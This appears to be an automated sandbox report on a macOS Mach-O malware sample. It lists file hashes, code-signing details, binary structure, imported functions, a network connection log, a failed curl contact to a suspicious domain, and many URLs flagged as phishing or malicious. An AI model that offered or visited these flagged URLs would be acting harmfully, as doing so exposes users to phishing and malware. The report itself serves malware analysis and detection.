                                                                        https://b5qm3iux.dreamwp.com/erepxs/tracking/fV5EjH/msg.php?id=97973728Get hashmaliciousUnknownBrowse
                                                                        • 151.101.66.137
                                                                        EDGECASTUSNew Voicemail_Daiichi-Sankyo.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                        • 152.199.4.44
                                                                        http://monacolife.netGet hashmaliciousUnknownBrowse
                                                                        • 152.199.5.152
                                                                        https://www.joesandbox.com/loginGet hashmaliciousUnknownBrowse
                                                                        • 152.199.5.152
                                                                        https://cvn7.sa.com/invoice.html?app=Get hashmaliciousHTMLPhisherBrowse
                                                                        • 152.199.4.44
                                                                        Payment Receipt .htmlGet hashmaliciousHTMLPhisherBrowse
                                                                        • 72.21.91.237
                                                                        https://tracker.club-os.com/campaign/click?msgId=f8ea317d963149a518aa35e03e5541f797badf3c&target=splendidanimations.com%2F%40%2FBigge/aDRmd79087aDRmd79087aDRmd/ZHN3ZWF6YUBiaWdnZS5jb20=Get hashmaliciousHTMLPhisherBrowse
                                                                        • 152.195.19.97
                                                                        https://www.canva.com/design/DAGCxF7mFTo/x_4mk65cpl5G5aJF2UYVbw/view?utm_content=DAGCxF7mFTo&utm_campaign=designshare&utm_medium=link&utm_source=editorGet hashmaliciousHTMLPhisherBrowse
                                                                        • 152.199.4.44
                                                                        http://t.cm.morganstanley.com/r/?id=h1b92d14,134cc33c,1356be32&p1=esi-doc.one/YWGTytNgAkCXj6A/c451eb59da652ea3e0bb7f8bf62dc775/c451eb59da652ea3e0bb7f8bf62dc775/c451eb59da652ea3e0bb7f8bf62dc775/bXNvbG9yemFub0Bsc2ZjdS5vcmc=&d=DwMGaQGet hashmaliciousHTMLPhisherBrowse
                                                                        • 152.199.4.44
                                                                        https://recouvrement-assurance.fr/LKeZLGet hashmaliciousUnknownBrowse
                                                                        • 152.199.24.185
                                                                        https://assets-gbr.mkt.dynamics.com/63445ada-d6fc-ee11-9046-002248c656ac/digitalassets/standaloneforms/4f16ddf0-7afd-ee11-a1fe-000d3ad499faGet hashmaliciousHTMLPhisherBrowse
                                                                        • 192.229.173.207
                                                                        FASTLYUSPlay_NewMessage_17April2024_Audio.htmGet hashmaliciousUnknownBrowse
                                                                        • 151.101.194.137
                                                                        http://tracking.elastic.iscarcup.com/tracking/click?d=XVOGkKKIFI1BUi5gqgZHAdRPhk99njZvP0qXh2IpArKp9RzCSjeoWkfJDrjbcvw75j380eQ4qSrYjhK4RegFgVWSX5L2beQO2AeFGF72kzLV5bUDHAc9_x1G5mw8AznhlHtuepCFbAQZbboWjeiG8YOae_yZBP5-luynay2YDr9Jmf0rVcJIVEgp8xRayU7B_A2Get hashmaliciousUnknownBrowse
                                                                        • 151.101.194.208
                                                                        http://monacolife.netGet hashmaliciousUnknownBrowse
                                                                        • 151.101.12.159
                                                                        https://www.joesandbox.com/loginGet hashmaliciousUnknownBrowse
                                                                        • 185.199.110.133
                                                                        https://jobrad.us1.list-manage.com/track/click?u=9c40c69097d5cc62620fab666&id=4174455835&e=1c8272e83cGet hashmaliciousUnknownBrowse
                                                                        • 151.101.1.229
                                                                        https://librospy.com/Get hashmaliciousUnknownBrowse
                                                                        • 151.101.64.114
                                                                        https://scsang.cn/Get hashmaliciousUnknownBrowse
                                                                        • 151.101.12.157
                                                                        https://cvn7.sa.com/invoice.html?app=Get hashmaliciousHTMLPhisherBrowse
                                                                        • 151.101.52.193
                                                                        https://15ab0ot.pages.dev/Get hashmaliciousPayPal PhisherBrowse
                                                                        • 151.101.193.21
                                                                        https://b5qm3iux.dreamwp.com/erepxs/tracking/fV5EjH/msg.php?id=97973728Get hashmaliciousUnknownBrowse
                                                                        • 151.101.66.137
                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        5c118da645babe52f060d0754256a73c89.kkGet hashmaliciousUnknownBrowse
                                                                        • 151.101.131.6
                                                                        • 151.101.195.6
                                                                        • 17.248.193.16
                                                                        • 151.101.67.6
                                                                        Arc12645415Get hashmaliciousUnknownBrowse
                                                                        • 151.101.131.6
                                                                        • 151.101.195.6
                                                                        • 17.248.193.16
                                                                        • 151.101.67.6
                                                                        SME.dmgGet hashmaliciousUnknownBrowse
                                                                        • 151.101.131.6
                                                                        • 151.101.195.6
                                                                        • 17.248.193.16
                                                                        • 151.101.67.6
                                                                        3MVd1q7ygy.machoGet hashmaliciousUnknownBrowse
                                                                        • 151.101.131.6
                                                                        • 151.101.195.6
                                                                        • 17.248.193.16
                                                                        • 151.101.67.6
                                                                        https://www.flazio.com/server.htmlGet hashmaliciousUnknownBrowse
                                                                        • 151.101.131.6
                                                                        • 151.101.195.6
                                                                        • 17.248.193.16
                                                                        • 151.101.67.6
                                                                        https://pub.marq.com/Downloadiiii-Fileee/Get hashmaliciousUnknownBrowse
                                                                        • 151.101.131.6
                                                                        • 151.101.195.6
                                                                        • 17.248.193.16
                                                                        • 151.101.67.6
                                                                        todoist-setup.dmgGet hashmaliciousUnknownBrowse
                                                                        • 151.101.131.6
                                                                        • 151.101.195.6
                                                                        • 17.248.193.16
                                                                        • 151.101.67.6
                                                                        http://marketplace-item-details-98756222.zya.meGet hashmaliciousUnknownBrowse
                                                                        • 151.101.131.6
                                                                        • 151.101.195.6
                                                                        • 17.248.193.16
                                                                        • 151.101.67.6
                                                                        DiogenesGet hashmaliciousUnknownBrowse
                                                                        • 151.101.131.6
                                                                        • 151.101.195.6
                                                                        • 17.248.193.16
                                                                        • 151.101.67.6
                                                                        https://acrobat.adobe.com/id/urn:aaid:sc:VA6C2:c139e8bc-e6cf-46e4-b94b-c8b5dea21199Get hashmaliciousUnknownBrowse
                                                                        • 151.101.131.6
                                                                        • 151.101.195.6
                                                                        • 17.248.193.16
                                                                        • 151.101.67.6
                                                                        No context
                                                                        Process:/usr/bin/curl
                                                                        File Type:ASCII text, with CR, LF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):292
                                                                        Entropy (8bit):3.651111449487769
                                                                        Encrypted:false
                                                                        SSDEEP:6:I2swj2SAykymUeX/8UniGdCSgOgcvRFNaA3YKVGh:Vz6ykymUe0bSc9cvRVm
                                                                        MD5:81F6B9B694BBADD68BAFF38716A1290E
                                                                        SHA1:570A457C8B101350A3DB0F489C3977E7B8852E62
                                                                        SHA-256:6E1DB63E25FBCC998A7326497F61DC15E67EC696153AAA473FE6B5A276A8E859
                                                                        SHA-512:D7CE37C8B6ECE36A1F47F3241C6C30E9E57845E3D24E551A88C47E524703E65D4C1AC18AAE86F0D137BB265FA1BD972B0B970FEC913F80CBDB2C29A630F4E1D4
                                                                        Malicious:false
                                                                        Reputation:low
                                                                        Preview: % Total % Received % Xferd Average Speed Time Time Time Current. Dload Upload Total Spent Left Speed.. 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0curl: (6) Could not resolve host: api.appsreforoma.com.
                                                                        File type:Mach-O 64-bit x86_64 executable, flags:<NOUNDEFS|DYLDLINK|TWOLEVEL|BINDS_TO_WEAK|PIE>
                                                                        Entropy (8bit):5.933933117666083
                                                                        TrID:
                                                                        • Mac OS X Mach-O 64-bit Intel executable (4008/2) 50.02%
                                                                        • Mac OS X Mach-O 64-bit executable (little-endian) (4004/1) 49.98%
                                                                        File name:malw_sampl
                                                                        File size:47'222 bytes
                                                                        MD5:d3e39930bca4c4b57f6e1f241f0a31c8
                                                                        SHA1:ca71f4ee36076497b3989e61352da70fa4dfca8b
                                                                        SHA256:02cfb65e0e38ef9ce7e431c66cdc53be3392bfe9bbed4840e18a8b30a1fd8d4a
                                                                        SHA512:b2b8812abc8551946018af4912d183a3b2cab4981526d8cd61fda90320eb4c882094d0fd9f0deaf62184c710f97bdff731f5943e80d90e9510b9d0af64f14abf
                                                                        SSDEEP:768:vKSrm5inFlv7aY1taE7A8sHlP/Tq80oTyq78WA76ZW0WAiJYD3ab8X:bFlWUtpc1/rAq78WA76ZW0WAimD3Kq
                                                                        TLSH:5B23291207755A11E9C095B472CA73B3CE22FA352EA1174B2792CA942FF7BF57B09206
                                                                        File Content Preview:..........................!.........H...__PAGEZERO..........................................................x...__TEXT...................`...............`......................__text..........__TEXT..................b:.....................................
                                                                        ["Executable=/Users/bernard/Desktop/malw_sampl","Identifier=com.K2IxiMJv6ltqvNdp9slXSQ","Format=Mach-O thin (x86_64)","CodeDirectory v=20200 size=506 flags=0x0(none) hashes=10+3 location=embedded","Hash type=sha256 size=32","CandidateCDHash sha1=5219baeb589d9658e548224448fb6b8a1745979c","CandidateCDHash sha256=df454b605f8cc435caaa81a338b72d48e2ff2d97","Hash choices=sha1,sha256","Page size=4096","CDHash=df454b605f8cc435caaa81a338b72d48e2ff2d97","Signature size=8923","Authority=Developer ID Application: Mitchell Penelope (49PT3G78ZF)","Authority=Developer ID Certification Authority","Authority=Apple Root CA","Timestamp=24 Jan 2018 at 02:03:12","Info.plist=not bound","TeamIdentifier=49PT3G78ZF","Sealed Resources=none","Internal requirements count=1 size=188"]
                                                                        General Information for header 1
                                                                        Endian:little-endian
                                                                        Size:64-bit
                                                                        Architecture:x86_64
                                                                        Filetype:execute
                                                                        Nbr. of load commands:19
                                                                        Entry point:0x100001410
                                                                        NameValue
                                                                        segname__PAGEZERO
                                                                        vmaddr0x0
                                                                        vmsize0x100000000
                                                                        fileoff0x0
                                                                        filesize0x0
                                                                        maxprot0x0
                                                                        initprot0x0
                                                                        nsects0
                                                                        flags0x0
                                                                        NameValue
                                                                        segname__TEXT
                                                                        vmaddr0x100000000
                                                                        vmsize0x6000
                                                                        fileoff0x0
                                                                        filesize0x6000
                                                                        maxprot0x7
                                                                        initprot0x5
                                                                        nsects7
                                                                        flags0x0
                                                                        Datas
                                                                        sectnamesegnameaddrsizeoffsetentropyalignreloffnrelocflags
                                                                        __text__TEXT0x1000014100x3A620x14106.0675156240x000x80000400
                                                                        __stubs__TEXT0x100004E720x1920x4E723.3559051210x000x80000400
                                                                        __stub_helper__TEXT0x1000050040x2860x50044.2813571920x000x80000400
                                                                        __const__TEXT0x1000052900x5A00x52907.4035622440x000x0
                                                                        __gcc_except_tab__TEXT0x1000058300x6940x58303.4240179420x000x0
                                                                        __cstring__TEXT0x100005EC40x60x5EC41.7924812500x000x0
                                                                        __unwind_info__TEXT0x100005ECC0x1300x5ECC4.2127916120x000x0
                                                                        NameValue
                                                                        segname__DATA
                                                                        vmaddr0x100006000
                                                                        vmsize0x1000
                                                                        fileoff0x6000
                                                                        filesize0x1000
                                                                        maxprot0x7
                                                                        initprot0x3
                                                                        nsects4
                                                                        flags0x0
                                                                        Datas
                                                                        sectnamesegnameaddrsizeoffsetentropyalignreloffnrelocflags
                                                                        __nl_symbol_ptr__DATA0x1000060000x100x6000-0.0000000030x000x0
                                                                        __got__DATA0x1000060100x480x6010-0.0000000030x000x0
                                                                        __la_symbol_ptr__DATA0x1000060580x2180x60582.3660090430x000x0
                                                                        __const__DATA0x1000062700x1C80x62702.0162171840x000x0
                                                                        NameValue
                                                                        segname__LINKEDIT
                                                                        vmaddr0x100007000
                                                                        vmsize0x5000
                                                                        fileoff0x7000
                                                                        filesize0x4850
                                                                        maxprot0x7
                                                                        initprot0x1
                                                                        nsects0
                                                                        flags0x0
                                                                        NameValue
                                                                        rebase_off28672
                                                                        rebase_size32
                                                                        bind_off28704
                                                                        bind_size1144
                                                                        weak_bind_off29848
                                                                        weak_bind_size88
                                                                        lazy_bind_off29936
                                                                        lazy_bind_size2088
                                                                        export_off32024
                                                                        export_size32
                                                                        NameValue
                                                                        symoff32112
                                                                        nsyms96
                                                                        stroff34228
                                                                        strsize2784
                                                                        NameValue
                                                                        ilocalsym0
                                                                        nlocalsym0
                                                                        iextdefsym0
                                                                        nextdefsym1
                                                                        iundefsym1
                                                                        nundefsym95
                                                                        tocoff0
                                                                        ntoc0
                                                                        modtaboff0
                                                                        nmodtab0
                                                                        extrefsymoff0
                                                                        nextrefsyms0
                                                                        indirectsymoff33648
                                                                        nindirectsyms145
                                                                        extreloff0
                                                                        nextrel0
                                                                        locreloff0
                                                                        nlocrel0
                                                                        NameValue
                                                                        NameValue
                                                                        uuid55dff74a-95f4-310a-add8-2016c1e36991
                                                                        NameValue
                                                                        version10.9.0
                                                                        sdk10.13.0
                                                                        NameValue
                                                                        path0.0.0.0.0
                                                                        NameValue
                                                                        NameValue
                                                                        compatibility_version1.0.0
                                                                        current_version400.9.0
                                                                        timestamp1970-01-01
                                                                        Datas/usr/lib/libc++.1.dylib
                                                                        NameValue
                                                                        compatibility_version1.0.0
                                                                        current_version50.0.0
                                                                        timestamp1970-01-01
                                                                        Datas/System/Library/Frameworks/ApplicationServices.framework/Versions/A/ApplicationServices
                                                                        NameValue
                                                                        compatibility_version1.0.0
                                                                        current_version1252.0.0
                                                                        timestamp1970-01-01
                                                                        Datas/usr/lib/libSystem.B.dylib
                                                                        NameValue
                                                                        compatibility_version150.0.0
                                                                        current_version1443.13.0
                                                                        timestamp1970-01-01
                                                                        Datas/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation
                                                                        NameValue
                                                                        dataoff32056
                                                                        datasize56
                                                                        NameValue
                                                                        dataoff32112
                                                                        datasize0
                                                                        NameValue
                                                                        dataoff37024
                                                                        datasize10160
                                                                        NameCategoryOriginSegment NameBind AddressLibrary Name
                                                                        __mh_execute_headerEXTERNALLC_SYMTAB
                                                                        _CFBundleCopyBundleURLUNDEFINEDLC_SYMTAB__DATA0x100006058/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation
                                                                        _CFBundleGetMainBundleUNDEFINEDLC_SYMTAB__DATA0x100006060/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation
                                                                        _CFReleaseUNDEFINEDLC_SYMTAB__DATA0x100006068/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation
                                                                        _CFStringGetCStringUNDEFINEDLC_SYMTAB__DATA0x100006070/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation
                                                                        _CFStringGetCStringPtrUNDEFINEDLC_SYMTAB__DATA0x100006078/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation
                                                                        _CFStringGetLengthUNDEFINEDLC_SYMTAB__DATA0x100006080/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation
                                                                        _CFURLCopyPathUNDEFINEDLC_SYMTAB__DATA0x100006088/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation
                                                                        _CFURLCopyResourcePropertyForKeyUNDEFINEDLC_SYMTAB__DATA0x100006090/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation
                                                                        _TransformProcessTypeUNDEFINEDLC_SYMTAB__DATA0x100006098/System/Library/Frameworks/ApplicationServices.framework/Versions/A/ApplicationServices
                                                                        __Unwind_ResumeUNDEFINEDLC_SYMTAB__DATA0x1000060A0/usr/lib/libSystem.B.dylib
                                                                        __ZNKSt3__120__vector_base_commonILb1EE20__throw_length_errorEvUNDEFINEDLC_SYMTAB__DATA0x1000060A8/usr/lib/libc++.1.dylib
                                                                        __ZNKSt3__120__vector_base_commonILb1EE20__throw_out_of_rangeEvUNDEFINEDLC_SYMTAB__DATA0x1000060B0/usr/lib/libc++.1.dylib
                                                                        __ZNKSt3__121__basic_string_commonILb1EE20__throw_length_errorEvUNDEFINEDLC_SYMTAB__DATA0x1000060B8/usr/lib/libc++.1.dylib
                                                                        __ZNKSt3__16locale9has_facetERNS0_2idEUNDEFINEDLC_SYMTAB__DATA0x1000060C0/usr/lib/libc++.1.dylib
                                                                        __ZNKSt3__16locale9use_facetERNS0_2idEUNDEFINEDLC_SYMTAB__DATA0x1000060C8/usr/lib/libc++.1.dylib
                                                                        __ZNKSt3__18ios_base6getlocEvUNDEFINEDLC_SYMTAB
                                                                        __ZNKSt9exception4whatEvUNDEFINEDLC_SYMTAB
                                                                        __ZNSt3__112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE6appendEPKcUNDEFINEDLC_SYMTAB__DATA0x1000060D0/usr/lib/libc++.1.dylib
                                                                        __ZNSt3__112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE6appendEPKcmUNDEFINEDLC_SYMTAB__DATA0x1000060D8/usr/lib/libc++.1.dylib
                                                                        __ZNSt3__112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE7reserveEmUNDEFINEDLC_SYMTAB__DATA0x1000060E0/usr/lib/libc++.1.dylib
                                                                        __ZNSt3__112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEEC1ERKS5_UNDEFINEDLC_SYMTAB__DATA0x1000060E8/usr/lib/libc++.1.dylib
                                                                        __ZNSt3__112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEEC1ERKS5_mmRKS4_UNDEFINEDLC_SYMTAB__DATA0x1000060F0/usr/lib/libc++.1.dylib
                                                                        __ZNSt3__113basic_istreamIcNS_11char_traitsIcEEED0EvUNDEFINEDLC_SYMTAB__DATA0x100006290/usr/lib/libc++.1.dylib
                                                                        __ZNSt3__113basic_istreamIcNS_11char_traitsIcEEED1EvUNDEFINEDLC_SYMTAB__DATA0x100006288/usr/lib/libc++.1.dylib
                                                                        __ZNSt3__113basic_istreamIcNS_11char_traitsIcEEED2EvUNDEFINEDLC_SYMTAB__DATA0x1000060F8/usr/lib/libc++.1.dylib
                                                                        __ZNSt3__113basic_ostreamIcNS_11char_traitsIcEEE3putEcUNDEFINEDLC_SYMTAB
                                                                        __ZNSt3__113basic_ostreamIcNS_11char_traitsIcEEE5flushEvUNDEFINEDLC_SYMTAB
                                                                        __ZNSt3__115basic_streambufIcNS_11char_traitsIcEEE5uflowEvUNDEFINEDLC_SYMTAB__DATA0x100006390/usr/lib/libc++.1.dylib
                                                                        __ZNSt3__115basic_streambufIcNS_11char_traitsIcEEE6xsgetnEPclUNDEFINEDLC_SYMTAB__DATA0x100006380/usr/lib/libc++.1.dylib
                                                                        __ZNSt3__115basic_streambufIcNS_11char_traitsIcEEE6xsputnEPKclUNDEFINEDLC_SYMTAB__DATA0x1000063A0/usr/lib/libc++.1.dylib
                                                                        __ZNSt3__115basic_streambufIcNS_11char_traitsIcEEE9showmanycEvUNDEFINEDLC_SYMTAB__DATA0x100006378/usr/lib/libc++.1.dylib
                                                                        __ZNSt3__115basic_streambufIcNS_11char_traitsIcEEEC2EvUNDEFINEDLC_SYMTAB__DATA0x100006100/usr/lib/libc++.1.dylib
                                                                        __ZNSt3__115basic_streambufIcNS_11char_traitsIcEEED2EvUNDEFINEDLC_SYMTAB__DATA0x100006108/usr/lib/libc++.1.dylib
                                                                        __ZNSt3__119__shared_weak_count16__release_sharedEvUNDEFINEDLC_SYMTAB__DATA0x100006110/usr/lib/libc++.1.dylib
                                                                        __ZNSt3__119__shared_weak_countD2EvUNDEFINEDLC_SYMTAB__DATA0x100006118/usr/lib/libc++.1.dylib
                                                                        __ZNSt3__14coutEUNDEFINEDLC_SYMTAB
                                                                        __ZNSt3__15ctypeIcE2idEUNDEFINEDLC_SYMTAB
                                                                        __ZNSt3__16localeC1ERKS0_UNDEFINEDLC_SYMTAB__DATA0x100006120/usr/lib/libc++.1.dylib
                                                                        __ZNSt3__16localeD1EvUNDEFINEDLC_SYMTAB__DATA0x100006128/usr/lib/libc++.1.dylib
                                                                        __ZNSt3__17codecvtIcc11__mbstate_tE2idEUNDEFINEDLC_SYMTAB__DATA0x100006010/usr/lib/libc++.1.dylib
                                                                        __ZNSt3__18ios_base4initEPvUNDEFINEDLC_SYMTAB__DATA0x100006130/usr/lib/libc++.1.dylib
                                                                        __ZNSt3__18ios_base5clearEjUNDEFINEDLC_SYMTAB__DATA0x100006138/usr/lib/libc++.1.dylib
                                                                        __ZNSt3__19basic_iosIcNS_11char_traitsIcEEED2EvUNDEFINEDLC_SYMTAB__DATA0x100006140/usr/lib/libc++.1.dylib
                                                                        __ZNSt8bad_castC1EvUNDEFINEDLC_SYMTAB__DATA0x100006148/usr/lib/libc++.1.dylib
                                                                        __ZNSt8bad_castD1EvUNDEFINEDLC_SYMTAB__DATA0x100006018/usr/lib/libc++.1.dylib
                                                                        __ZNSt9exceptionD0EvUNDEFINEDLC_SYMTAB
                                                                        __ZNSt9exceptionD1EvUNDEFINEDLC_SYMTAB__DATA0x100006150/usr/lib/libc++.1.dylib
                                                                        __ZSt9terminatevUNDEFINEDLC_SYMTAB__DATA0x100006158/usr/lib/libc++.1.dylib
                                                                        __ZTINSt3__113basic_istreamIcNS_11char_traitsIcEEEEUNDEFINEDLC_SYMTAB__DATA0x1000063E0/usr/lib/libc++.1.dylib
                                                                        __ZTINSt3__115basic_streambufIcNS_11char_traitsIcEEEEUNDEFINEDLC_SYMTAB__DATA0x1000063C0/usr/lib/libc++.1.dylib
                                                                        __ZTINSt3__119__shared_weak_countEUNDEFINEDLC_SYMTAB__DATA0x100006430/usr/lib/libc++.1.dylib
                                                                        __ZTISt8bad_castUNDEFINEDLC_SYMTAB__DATA0x100006020/usr/lib/libc++.1.dylib
                                                                        __ZTISt9exceptionUNDEFINEDLC_SYMTAB__DATA0x100006028/usr/lib/libc++.1.dylib
                                                                        __ZTVN10__cxxabiv120__si_class_type_infoEUNDEFINEDLC_SYMTAB__DATA0x100006420/usr/lib/libc++.1.dylib
                                                                        __ZTVSt9exceptionUNDEFINEDLC_SYMTAB__DATA0x100006030/usr/lib/libc++.1.dylib
                                                                        __ZTv0_n24_NSt3__113basic_istreamIcNS_11char_traitsIcEEED0EvUNDEFINEDLC_SYMTAB__DATA0x1000062B8/usr/lib/libc++.1.dylib
                                                                        __ZTv0_n24_NSt3__113basic_istreamIcNS_11char_traitsIcEEED1EvUNDEFINEDLC_SYMTAB__DATA0x1000062B0/usr/lib/libc++.1.dylib
                                                                        __ZdaPvUNDEFINEDLC_SYMTAB__DATA0x100006160
                                                                        __ZdlPvUNDEFINEDLC_SYMTAB__DATA0x100006168
                                                                        __ZnamUNDEFINEDLC_SYMTAB__DATA0x100006170
                                                                        __ZnwmUNDEFINEDLC_SYMTAB__DATA0x100006178
                                                                        ___bzeroUNDEFINEDLC_SYMTAB__DATA0x100006180/usr/lib/libSystem.B.dylib
                                                                        ___cxa_allocate_exceptionUNDEFINEDLC_SYMTAB__DATA0x100006188/usr/lib/libc++.1.dylib
                                                                        ___cxa_begin_catchUNDEFINEDLC_SYMTAB__DATA0x100006190/usr/lib/libc++.1.dylib
                                                                        ___cxa_end_catchUNDEFINEDLC_SYMTAB__DATA0x100006198/usr/lib/libc++.1.dylib
                                                                        ___cxa_get_exception_ptrUNDEFINEDLC_SYMTAB__DATA0x1000061A0/usr/lib/libc++.1.dylib
                                                                        ___cxa_rethrowUNDEFINEDLC_SYMTAB__DATA0x1000061A8/usr/lib/libc++.1.dylib
                                                                        ___cxa_throwUNDEFINEDLC_SYMTAB__DATA0x1000061B0/usr/lib/libc++.1.dylib
                                                                        ___gxx_personality_v0UNDEFINEDLC_SYMTAB__DATA0x100006038/usr/lib/libc++.1.dylib
                                                                        ___stack_chk_failUNDEFINEDLC_SYMTAB__DATA0x1000061B8/usr/lib/libSystem.B.dylib
                                                                        ___stack_chk_guardUNDEFINEDLC_SYMTAB__DATA0x100006040/usr/lib/libSystem.B.dylib
                                                                        _accessUNDEFINEDLC_SYMTAB__DATA0x1000061C0/usr/lib/libSystem.B.dylib
                                                                        _chmodUNDEFINEDLC_SYMTAB__DATA0x1000061C8/usr/lib/libSystem.B.dylib
                                                                        _fcloseUNDEFINEDLC_SYMTAB__DATA0x1000061D0/usr/lib/libSystem.B.dylib
                                                                        _feofUNDEFINEDLC_SYMTAB__DATA0x1000061D8/usr/lib/libSystem.B.dylib
                                                                        _fflushUNDEFINEDLC_SYMTAB__DATA0x1000061E0/usr/lib/libSystem.B.dylib
                                                                        _fgetsUNDEFINEDLC_SYMTAB__DATA0x1000061E8/usr/lib/libSystem.B.dylib
                                                                        _fopenUNDEFINEDLC_SYMTAB__DATA0x1000061F0/usr/lib/libSystem.B.dylib
                                                                        _freadUNDEFINEDLC_SYMTAB__DATA0x1000061F8/usr/lib/libSystem.B.dylib
                                                                        _fseekoUNDEFINEDLC_SYMTAB__DATA0x100006200/usr/lib/libSystem.B.dylib
                                                                        _ftelloUNDEFINEDLC_SYMTAB__DATA0x100006208/usr/lib/libSystem.B.dylib
                                                                        _fwriteUNDEFINEDLC_SYMTAB__DATA0x100006210/usr/lib/libSystem.B.dylib
                                                                        _kCFURLVolumeURLKeyUNDEFINEDLC_SYMTAB__DATA0x100006048/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation
                                                                        _memcpyUNDEFINEDLC_SYMTAB__DATA0x100006218/usr/lib/libSystem.B.dylib
                                                                        _memmoveUNDEFINEDLC_SYMTAB__DATA0x100006220/usr/lib/libSystem.B.dylib
                                                                        _mkdirUNDEFINEDLC_SYMTAB__DATA0x100006228/usr/lib/libSystem.B.dylib
                                                                        _pcloseUNDEFINEDLC_SYMTAB__DATA0x100006230/usr/lib/libSystem.B.dylib
                                                                        _popenUNDEFINEDLC_SYMTAB__DATA0x100006238/usr/lib/libSystem.B.dylib
                                                                        _snprintfUNDEFINEDLC_SYMTAB__DATA0x100006240/usr/lib/libSystem.B.dylib
                                                                        _sprintfUNDEFINEDLC_SYMTAB__DATA0x100006248/usr/lib/libSystem.B.dylib
                                                                        _strlenUNDEFINEDLC_SYMTAB__DATA0x100006250/usr/lib/libSystem.B.dylib
                                                                        _systemUNDEFINEDLC_SYMTAB__DATA0x100006258/usr/lib/libSystem.B.dylib
                                                                        _uuid_generate_randomUNDEFINEDLC_SYMTAB__DATA0x100006260/usr/lib/libSystem.B.dylib
                                                                        _uuid_unparseUNDEFINEDLC_SYMTAB__DATA0x100006268/usr/lib/libSystem.B.dylib
                                                                        dyld_stub_binderUNDEFINEDLC_SYMTAB__DATA0x100006000/usr/lib/libSystem.B.dylib
                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Apr 19, 2024 11:45:18.399475098 CEST8049346192.229.211.108192.168.11.12
                                                                        Apr 19, 2024 11:45:18.400273085 CEST4934680192.168.11.12192.229.211.108
                                                                        Apr 19, 2024 11:45:18.408508062 CEST44349345151.101.131.6192.168.11.12
                                                                        Apr 19, 2024 11:45:18.408576965 CEST44349345151.101.131.6192.168.11.12
                                                                        Apr 19, 2024 11:45:18.409255028 CEST49345443192.168.11.12151.101.131.6
                                                                        Apr 19, 2024 11:45:18.424987078 CEST44349347151.101.131.6192.168.11.12
                                                                        Apr 19, 2024 11:45:18.425803900 CEST49347443192.168.11.12151.101.131.6
                                                                        Apr 19, 2024 11:45:18.427550077 CEST49349443192.168.11.1217.248.193.16
                                                                        Apr 19, 2024 11:45:18.430279970 CEST49347443192.168.11.12151.101.131.6
                                                                        Apr 19, 2024 11:45:18.589449883 CEST44349347151.101.131.6192.168.11.12
                                                                        Apr 19, 2024 11:45:18.591814041 CEST44349347151.101.131.6192.168.11.12
                                                                        Apr 19, 2024 11:45:18.591923952 CEST44349347151.101.131.6192.168.11.12
                                                                        Apr 19, 2024 11:45:18.591979980 CEST44349347151.101.131.6192.168.11.12
                                                                        Apr 19, 2024 11:45:18.592035055 CEST44349347151.101.131.6192.168.11.12
                                                                        Apr 19, 2024 11:45:18.592076063 CEST44349347151.101.131.6192.168.11.12
                                                                        Apr 19, 2024 11:45:18.593907118 CEST49347443192.168.11.12151.101.131.6
                                                                        Apr 19, 2024 11:45:18.593907118 CEST49347443192.168.11.12151.101.131.6
                                                                        Apr 19, 2024 11:45:18.594001055 CEST49347443192.168.11.12151.101.131.6
                                                                        Apr 19, 2024 11:45:18.594356060 CEST49347443192.168.11.12151.101.131.6
                                                                        Apr 19, 2024 11:45:18.602334976 CEST49347443192.168.11.12151.101.131.6
                                                                        Apr 19, 2024 11:45:18.636116982 CEST49350443192.168.11.12151.101.131.6
                                                                        Apr 19, 2024 11:45:18.691232920 CEST4434934917.248.193.16192.168.11.12
                                                                        Apr 19, 2024 11:45:18.692198038 CEST49349443192.168.11.1217.248.193.16
                                                                        Apr 19, 2024 11:45:18.696751118 CEST49349443192.168.11.1217.248.193.16
                                                                        Apr 19, 2024 11:45:18.761454105 CEST44349347151.101.131.6192.168.11.12
                                                                        Apr 19, 2024 11:45:18.761513948 CEST44349347151.101.131.6192.168.11.12
                                                                        Apr 19, 2024 11:45:18.762214899 CEST49347443192.168.11.12151.101.131.6
                                                                        Apr 19, 2024 11:45:18.795105934 CEST44349350151.101.131.6192.168.11.12
                                                                        Apr 19, 2024 11:45:18.795829058 CEST49350443192.168.11.12151.101.131.6
                                                                        Apr 19, 2024 11:45:18.796669960 CEST49350443192.168.11.12151.101.131.6
                                                                        Apr 19, 2024 11:45:18.955625057 CEST44349350151.101.131.6192.168.11.12
                                                                        Apr 19, 2024 11:45:18.957479954 CEST44349350151.101.131.6192.168.11.12
                                                                        Apr 19, 2024 11:45:18.957592964 CEST44349350151.101.131.6192.168.11.12
                                                                        Apr 19, 2024 11:45:18.957603931 CEST44349350151.101.131.6192.168.11.12
                                                                        Apr 19, 2024 11:45:18.957616091 CEST44349350151.101.131.6192.168.11.12
                                                                        Apr 19, 2024 11:45:18.957623959 CEST44349350151.101.131.6192.168.11.12
                                                                        Apr 19, 2024 11:45:18.958842039 CEST49350443192.168.11.12151.101.131.6
                                                                        Apr 19, 2024 11:45:18.958889008 CEST49350443192.168.11.12151.101.131.6
                                                                        Apr 19, 2024 11:45:18.958889008 CEST49350443192.168.11.12151.101.131.6
                                                                        Apr 19, 2024 11:45:18.959902048 CEST49350443192.168.11.12151.101.131.6
                                                                        Apr 19, 2024 11:45:18.960212946 CEST4434934917.248.193.16192.168.11.12
                                                                        Apr 19, 2024 11:45:18.960472107 CEST4434934917.248.193.16192.168.11.12
